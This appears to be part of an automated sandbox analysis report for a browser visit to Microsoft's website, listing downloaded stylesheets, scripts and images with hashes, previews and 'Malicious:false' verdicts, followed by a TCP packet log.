                                                                                                                                                                                                                                                          SHA-512:C493FBD6926006108E56E23BB204BFE59A7364ED6D2409B5B258D9EA6C060259E13A7E7A22021607F6EDD55EEA52C75DFE7FCF18BB76D6E539FBD763BF399185
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/dynamicclientsidelibs/handlerscripts/v1.min.ACSHASHd7106db242c2b41f88a1b02418bec7e2.js
                                                                                                                                                                                                                                                          Preview:'use strict';var DynamicClientSideScriptHandler=function(){return{fetchScriptLink:function(b){var a=(a=document.querySelector('div[data-identifier\x3d"'+b+'"]'))?a.getAttribute("data-content"):null;null===a&&(a=(b=document.querySelector('meta[name\x3d"'+b+'"]'))?b.getAttribute("content"):null);return a}}}();
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):982
                                                                                                                                                                                                                                                          Entropy (8bit):5.055900899767409
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:rcqRGL6h2oUfl+VYYUWXyqyNFX4VqRzseNcUmsVz:rFeiVPCBqqRY6DVz
                                                                                                                                                                                                                                                          MD5:FA6F56B2D3037982772378233706C9AF
                                                                                                                                                                                                                                                          SHA1:A511B80627BF05C511F348B3C1AAF4F2FA174365
                                                                                                                                                                                                                                                          SHA-256:BE37586E1929EF52245871FB9FB2C2E2A31A14EE9B421439CA67948EC4036188
                                                                                                                                                                                                                                                          SHA-512:14E7287DEFBE26244B9C19EDAE24B3BFE7E336D41FA1AE85142B8ECB18CC20458953B0BBEC9E10EF6691FDB059494BFE65269AB47D2A2AC49A84D6EF7F2AFFAC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-chat.min.ACSHASHfa6f56b2d3037982772378233706c9af.css
                                                                                                                                                                                                                                                          Preview:#chat-now-link:not(.pmg-chat-active),#chat-button:not(.pmg-chat-active),#pmg-chat-now:not(.pmg-chat-active),#chat-now:not(.pmg-chat-active),#mobile-chat-now:not(.pmg-chat-active){display:none !important}.[data-oc-chat='true'],[data-oc-widget-chat='true'],[data-oc-widget-chat-bot='true']{display:inline-block !important}..proactive-chat-hidden{display:none !important}..lp-iframe-close{display:none}.#lp-iframe-container{border:0;bottom:24px;box-shadow:0 5px 15px 0 rgba(0,0,0,0.25);height:500px;left:auto !important;min-width:300px;max-width:350px;padding:0;position:fixed;right:0;top:auto !important;z-index:1031}.#lp-iframe-container,#lp-iframe-container .lp-iframe-window{border-radius:5px}..lp-live-person .c-flyout{font-size:15px;position:absolute;background:#fff;min-width:128px;max-width:296px;padding:12px;z-index:700;display:none}..lp-live-person [aria-hidden="false"]{display:block}..lp-live-person .lp-iframe-window{border:1px solid transparent;height:500px;width:350px}
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 1720 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):13016
                                                                                                                                                                                                                                                          Entropy (8bit):7.883155506636877
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:1usWVOBxMoGH4u9YRcVnk3rPnmE+59UOy+tYwOjPMZdC8NhfQyQYLWrBvo04uE:GKx3GH/9Y0cmAOXtYwOadVhfyYLyP4uE
                                                                                                                                                                                                                                                          MD5:F5B4B4F04F1924F9470DC3C0B3E4FC01
                                                                                                                                                                                                                                                          SHA1:28D187B90F70638832771600CD556BC85B418A37
                                                                                                                                                                                                                                                          SHA-256:98FB37F9F0DA54BB17E1322E1A49D5D683854A0BD3DE47C01EB3F0CCBB8B2999
                                                                                                                                                                                                                                                          SHA-512:676E6866C149E56699CA65887D4DB5903CD6F84D32987215F218082E4E441340931221BDED2A78512DEDF417848379DD7E45BF4F87804BC7FEFF7CB3632CB53B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://lpcdn.lpsnmedia.net/le_unified_window/10.13.0.5-release_5314/resources/icons/desktop/sprites_v1.png?v=10.13.0.5-release_5314%22%20alt=%22End%20conversation
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......P.....B.uk....pHYs...........~... .IDATx.....\.u..+{)....b...G9d....hL#....."p-[K.J.6G.;..i4..q.8.0q.vk...QVk#...3.lq...a+....J.....b..vQ....b..)...s..7....w.}.... w~.}3.....k.^.h.....X.z}.a.9<...............-o......c.-..s.Ti.......^x...g_.i...=........\R?0S....sg.....G....o.J.m...].b....u...w.Z...[...}.l...1.~..B...7.\HT?0S...n....y"......z}.^`.4.T....Y......?7w.;..A...X...s..Um..~`..V..G.J,$.5...Mg..#.|...S...O.?..u..7]{....nxK.....?2.<.....N..i...?....=.......q....>..c[..f...#.jG..F.!6.......G.}O.~.*.$..w..+..,....M.>.}....6T$1g?.Z......1.l_5....6.-......-.W.$..B"9!V.q.JCd....G.I.C8...... 4....K....mH....d.&..IT..<.~...,Hp.%.v.@.~.7k......Z.Y......p.^#.....l.35..5I`j'%..1..x.........={.*o....bye..;v..1./~.w[..{@.N...J.mG..z...[w.=x....K....C..\......;....{o....Y..?...K;c..~...u.)m.M...m-.g.}O.MU.7.~._.eK~..UI 6Ht..l6.........F2v....q.zV..TZ..w}v.....h.t...T%..>5.7.$.{A...lsY..2.K..f.b.>....)...K...RL
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (328)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):83790
                                                                                                                                                                                                                                                          Entropy (8bit):4.9173035358358055
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:xe0Bv5vFfdFfjnlp+EnC3/CEVOBN7o1/p9qPFfoPqOdpyvWWAx0j5n1fXd:xr5vtZN7+/pjyvWE
                                                                                                                                                                                                                                                          MD5:6CFDA6CBA38E1A36956E8F99C51A9CDC
                                                                                                                                                                                                                                                          SHA1:D201B50CD26507782770290EB03556695AA5DDD0
                                                                                                                                                                                                                                                          SHA-256:6303067888A7FAED3E8AAB486A8CFBA6556C8375CBEDE4E507646C133B17EF58
                                                                                                                                                                                                                                                          SHA-512:B1A5BD3C2B80E87E3BA62F77A7004772B94EEA9D2B0EBA5C8659960115AD383174820531D8B85DE578E423C23227605F7096A741DE1237E517B0A598475EF0C8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-web-components/styles.min.ACSHASH6cfda6cba38e1a36956e8f99c51a9cdc.css
                                                                                                                                                                                                                                                          Preview:/*!. * Reimagine WC Theming v11.0.2. * OneCloud Reimagine v0.256.0. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc.. */./* stylelint-disable value-list-comma-space-after */./* stylelint-disable value-list-comma-newline-after */.@font-face {. font-family: MWF-FLUENT-ICONS;. src: url("styles/fonts/MWFFluentIcons.woff2") format("woff2"), url("styles/fonts/MWFFluentIcons.woff") format("woff"), url("styles/fonts/MWFFluentIcons.ttf") format("truetype"); }..@font-face {. font-family: SegoeUI;. src: local("Segoe UI"), url("//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2") format("woff2"), url("//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff") format("woff"), url("//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf") format("ttf");. font-weight: 400; }..@font-face {. font-family: SegoeUI;. src: local("Segoe UI"), url
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (64796)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):600180
                                                                                                                                                                                                                                                          Entropy (8bit):5.118133182005812
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:ZwWdxqRnrdICH1B9TZXire7Dqsx0C9i98nrBsMJgKbQe8yD:9q2K/
                                                                                                                                                                                                                                                          MD5:B66691F153FB100D708E3BA31BF274C7
                                                                                                                                                                                                                                                          SHA1:90D964F5962CE392997DD58229E03B1C6F95B9B9
                                                                                                                                                                                                                                                          SHA-256:908813F23C64E9B5DA1F82C4444D8AEC2A535192794692DDA5A30D5ADE9D150B
                                                                                                                                                                                                                                                          SHA-512:4BD653A101A96F24C37F73134673FDE186EC8520F26B14B41682389E8C77AA1B2071BDB8897D3C3F2422590041939DD44A496169FA8FF7AD120DA88D481AE943
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine/main-light.min.ACSHASHb66691f153fb100d708e3ba31bf274c7.css
                                                                                                                                                                                                                                                          Preview:@charset "UTF-8";/*!. * OneCloud Reimagine v0.309.0. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc.. */.fixed-back-to-top{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important;pointer-events:none}@media (prefers-reduced-motion:reduce){.fixed-back-to-top{transition:none}}.fixed-back-to-top.fixed-sticky.stuck{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important}@media (prefers-reduced-motion:reduce){.fixed-back-to-top.fixed-sticky.stuck{transition:none}}@media screen and (max-width:540px){.fixed-back-to-top.stuck{position:static}}.fixed-back-to-top .btn{pointer-events:auto}.fixed-sticky{transition:background .2s ease-out,shadow .2s ease-out}.fixed-sticky .sticky-show-stuck{display:none}.fixed-sticky.get-height .sticky-show-stuck{display:block;visibility:hidden;opacity:0;position:fixed;left:-9999px;width:100%}.fixed-sticky.stuck{position:fixed;left:0;right:0;width:100%;z-index:1020;t
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):11743
                                                                                                                                                                                                                                                          Entropy (8bit):7.971171069454427
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:+WfOTJjn2HhyK3pAHDxp2YP7uTb8lyvOPO/srcPOj+xX35r3ublyH1126r3:IJjC0Fjlw8YkysrcbXJYyV9r3
                                                                                                                                                                                                                                                          MD5:A63F7F5CD797BE2171D3586665AE89AC
                                                                                                                                                                                                                                                          SHA1:168939BDD1F86545AB8AD4013B3989B726A25591
                                                                                                                                                                                                                                                          SHA-256:0C78D2C573B6E9C9D6484B0556C62AD54A96134FA24FA2EFF0935CD19788787C
                                                                                                                                                                                                                                                          SHA-512:B89AC46E15A8890927B5FA66DF9C821461042A192F52EF05D52B50AAA0CAA38315B854471F54815668A1016CFD983804E95B39A4986FE812D5795E18C32A71E9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/full-screen-banner-1600x428?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=428&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............,....(iinf..........infe........av01Color....jiprp...Kipco....ispe.......@........pixi............av1C........colrnclx...........ipma.................,.mdat.....j1.......2.YD......2..f~.Lj.<..#.D..Z..H.....c.......'.....[....8m.....4v. .Z#.e..H..cz.ve..j.............9A.........."..0.C..4.-....]..`=.;.-.5.<.+.Y.....s...c"Y.m\..2..R.|dD..q./.a....ky.zR..`J6...-..Y......S....C.Z..]...~..1g{p7....-Y.*USqQ..b.."K....O:..s.1.F.l.4./.../..Hl\...2A..7GI..\iH.B...rU=.6...6.....`'...n....b...u.......M}Am.....r..._3....o..z.!.";......2...X.....:[Ym...@^..<.m.-..C.G..bw..R.*$.Ed....!1g.3...7..xm..x..n...........i.K.....Z..k..\.j...i....f..?A......+O.....@....1TG..U...T..|r.;......../:.Z.,.Na.cL..PR......x..vN.L.?.#.m..%]2...=.E..V....................k.......2.>.......\..bE....`.I...8..v#...V^.@.5t...n........m.b.....:..m.>v...
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (678)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):5243
                                                                                                                                                                                                                                                          Entropy (8bit):5.395959363705534
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:1CSAZUwgGG0g8WrsrArzrLHSaZDeZAZkqQZqp74SfCS9H/iNf/jxvR1SPkbQ2:4SUgGG0vWrsrArzCgGzqzBoFY8D
                                                                                                                                                                                                                                                          MD5:3DB5CF9FD3FAB92B3889302C8DE78D1B
                                                                                                                                                                                                                                                          SHA1:1C493C13BC775036B36ACBA37941375ED0CE2ADA
                                                                                                                                                                                                                                                          SHA-256:D29DB6171FCF5458896561430C466007D6E9709F83DF0CB950E273B93DDA7853
                                                                                                                                                                                                                                                          SHA-512:1B13D7AA880D8987B5120FB6BB21CE53F6FB7769061E35C2BB87B59F32F176D52FC7F208461A7603EDCE26318E022B75F2CB27791C5D7A7D826B2C141D33AA70
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-cookievalidator.min.ACSHASH3db5cf9fd3fab92b3889302c8de78d1b.js
                                                                                                                                                                                                                                                          Preview:'use strict';(function(){function q(){return new Promise(function(e){window.oa=window.oa||{load:!0};(function(h,k){function m(b){b+="\x3d";for(var f=decodeURIComponent(h.cookie).split(";"),g=0;g<f.length;g++){for(var a=f[g];" "===a.charAt(0);)a=a.substring(1);if(0===a.indexOf(b))return a.substring(b.length,a.length)}return""}function p(b,f){if("function"===typeof b[3])b[3](b);var g=f.createElement("script");g.type="text/javascript";g.src=b[1];g.async=b[2];g.addEventListener("load",function(){b[4](b);.e()});g.addEventListener("readystatechange",function(){"complete"===this.readyState&&b[4](b)});if(b[8])b[8]();f.getElementsByTagName("head")[0].appendChild(g)}window.oa.container||(window.oa.container=!0,!function(b,f,g,a){for(var d=f.getElementsByTagName("script"),c=0;c<b.length;c++){var l=a(g.location.search.toLowerCase(),f.cookie),n=b[c];if(-1===Array.prototype.indexOf.call(d,f.location.protocol+n[1])&&n[6]&&n[0].test(f.location.href)){if(l!==n[5]&&null!==n[5]||m("bp_"+n[7].split(" ").j
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (584)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):6798
                                                                                                                                                                                                                                                          Entropy (8bit):5.383941368080596
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:2+ocdo4VYgB9G/0y/qhNJ5k4iflBDHndCjOGGWr:2+ocdo4B7G/0yyNSflhndCjOGGA
                                                                                                                                                                                                                                                          MD5:1DABD5CC3F7B68C178B59EA74DC62947
                                                                                                                                                                                                                                                          SHA1:B8DF9D8FD267B8B74325667DC97278CCC90A1464
                                                                                                                                                                                                                                                          SHA-256:E49EFB0A75AF4995902362EA679A0FC4EB120A881A090CB8424D5CBD183436A2
                                                                                                                                                                                                                                                          SHA-512:8C26E45CA37AC5DCCCC0C7BBCA92E0E8E11FB807A6D9A6916D5A0CC1CF198A7942DD5583C31ACBD1A11DDE004C252806D205E9CFDA7F494A6F7D5BBFA42920E4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';(()=>{function m(f){var e=G[f];if(void 0!==e)return e.exports;e=G[f]={exports:{}};return I[f](e,e.exports,m),e.exports}var I={1623:()=>{$(function(){function f(){-1!==document.cookie.indexOf("".concat("Cascade.AuthSSO","\x3d"))&&(document.cookie="".concat("Cascade.AuthSSO","\x3d; expires\x3dThu, 01 Jan 1970 00:00:00 UTC;"))}function e(){var a=function(){var d=document.cookie.match(/(^|;\s*)(Cascade.AuthSSO)=([^;]*)/);return d?(d=parseInt(decodeURIComponent(d[3])),!isNaN(d)&&d>n.DefaultAttempted?.n.SharedStateAttempted:n.DefaultAttempted):n.NotAttempted}(),c=!(!window.msauthRpsShare||b.accountConstraint===w.AAD);if(a===n.NotAttempted||c&&a!==n.SharedStateAttempted)!function(d){$("#".concat("cascadeauthsso")).remove();var g=document.createElement("iframe");g.src=d;g.setAttribute("width","0");g.setAttribute("height","0");g.setAttribute("border","0");g.setAttribute("frameborder","0");g.setAttribute("style","display: none");g.id="cascadeauthsso";document.body.appendChild(g)}(""
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (64796)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):601590
                                                                                                                                                                                                                                                          Entropy (8bit):5.1132841149611625
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:twWdLqRnrdICH1BoTZXire7Dqsx0C9i98nrBsMJgKbQe8yV:rqfK5
                                                                                                                                                                                                                                                          MD5:5851A3C4533D1BE9266FAAD8E3026BF4
                                                                                                                                                                                                                                                          SHA1:304586BE355757BD34C1676E6832776C4CD252FF
                                                                                                                                                                                                                                                          SHA-256:3D315E173769914507E72E4F2AA9ECEEB466975F709FC1176906F61A2DDBD308
                                                                                                                                                                                                                                                          SHA-512:9BE562E48B228E8315B079BB4A3349AD99B29B0C5BF1F370FEAF5BC41B59E30F27B1944B521A60C13BFA5C9E338B206F27709B5A283C7CE4BB1D04849CA504E4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine/main-power-platform-all-up.min.ACSHASH5851a3c4533d1be9266faad8e3026bf4.css
                                                                                                                                                                                                                                                          Preview:@charset "UTF-8";/*!. * OneCloud Reimagine v0.309.0. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc.. */.fixed-back-to-top{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important;pointer-events:none}@media (prefers-reduced-motion:reduce){.fixed-back-to-top{transition:none}}.fixed-back-to-top.fixed-sticky.stuck{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important}@media (prefers-reduced-motion:reduce){.fixed-back-to-top.fixed-sticky.stuck{transition:none}}@media screen and (max-width:540px){.fixed-back-to-top.stuck{position:static}}.fixed-back-to-top .btn{pointer-events:auto}.fixed-sticky{transition:background .2s ease-out,shadow .2s ease-out}.fixed-sticky .sticky-show-stuck{display:none}.fixed-sticky.get-height .sticky-show-stuck{display:block;visibility:hidden;opacity:0;position:fixed;left:-9999px;width:100%}.fixed-sticky.stuck{position:fixed;left:0;right:0;width:100%;z-index:1020;t
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):306
                                                                                                                                                                                                                                                          Entropy (8bit):4.918725003124441
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:tnrwdhC/gKumc4slvIPXH0HXUXfWioNzQgTdf6t00Lt7UMLtNptSM:trwdU/gKuCPXH0HXUXfb1g5f6t0kRh
                                                                                                                                                                                                                                                          MD5:0ED6A4BBAC11D3B19565F7F4F11D7FBE
                                                                                                                                                                                                                                                          SHA1:26D0A4F103F89E841B57956240FF0BA142DEEA70
                                                                                                                                                                                                                                                          SHA-256:3827D704E1284CAD183FA3F78D37C1CE2DDD37A3D71450ACCD173A8AB369B77D
                                                                                                                                                                                                                                                          SHA-512:FB8680FFC0904EE89E1BE9C8E62A68825C52C649600CAB1C10105C4AA04ACA325780430800D179A687EA81635D509BBBA23D5796B619B209A23A5BE8132997A5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/content/dam/microsoft/final/en-us/microsoft-brand/icons/Discover-relevant-reports.svg
                                                                                                                                                                                                                                                          Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M21 6.43359V24H3V0H14.5664L21 6.43359ZM15 6H18.4336L15 2.56641V6ZM19.5 22.5V7.5H13.5V1.5H4.5V22.5H19.5ZM10.5 16.5H13.5V21H10.5V16.5ZM6 13.5H9V21H6V13.5ZM15 10.5H18V21H15V10.5Z" fill="#0078D4"/>.</svg>.
                                                                                                                                                                                                                                                          No static file info
                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:30.319500923 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:30.319518089 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:30.413259983 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:39.933689117 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:39.933686972 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:40.022397041 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.310089111 CET49712443192.168.2.5172.217.19.228
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.310157061 CET44349712172.217.19.228192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.310259104 CET49712443192.168.2.5172.217.19.228
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.310458899 CET49712443192.168.2.5172.217.19.228
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.310496092 CET44349712172.217.19.228192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.411006927 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.411093950 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.019104958 CET44349712172.217.19.228192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.019351006 CET49712443192.168.2.5172.217.19.228
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.019391060 CET44349712172.217.19.228192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.020368099 CET44349712172.217.19.228192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.020437002 CET49712443192.168.2.5172.217.19.228
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.024766922 CET49712443192.168.2.5172.217.19.228
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.024981022 CET44349712172.217.19.228192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.075934887 CET49712443192.168.2.5172.217.19.228
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.075953007 CET44349712172.217.19.228192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.122869015 CET49712443192.168.2.5172.217.19.228
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.217947006 CET49713443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.217991114 CET44349713104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.218086004 CET49713443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.218708038 CET49714443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.218744993 CET44349714104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.218802929 CET49714443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.219415903 CET49713443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.219434023 CET44349713104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.219800949 CET49714443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.219819069 CET44349714104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.440323114 CET44349714104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.440614939 CET49714443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.440632105 CET44349714104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.442277908 CET44349714104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.442361116 CET49714443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.443392038 CET49714443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.443471909 CET44349714104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.443567991 CET49714443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.443573952 CET44349714104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.443648100 CET49714443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.443660975 CET49714443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.443950891 CET49716443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.443962097 CET44349716104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.444035053 CET49716443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.444422007 CET49716443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.444433928 CET44349716104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.447809935 CET44349713104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.448112965 CET49713443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.448122025 CET44349713104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.449763060 CET44349713104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.449841022 CET49713443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.454662085 CET49713443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.454744101 CET44349713104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.454830885 CET49713443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.454837084 CET44349713104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.454869032 CET49713443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.454967976 CET49713443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.455204964 CET49717443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.455277920 CET44349717104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.455348969 CET49717443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.455585957 CET49717443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:45.455620050 CET44349717104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:46.663161993 CET44349716104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:46.663409948 CET49716443192.168.2.5104.21.80.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:46.663424015 CET44349716104.21.80.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:46.664979935 CET44349716104.21.80.1192.168.2.5
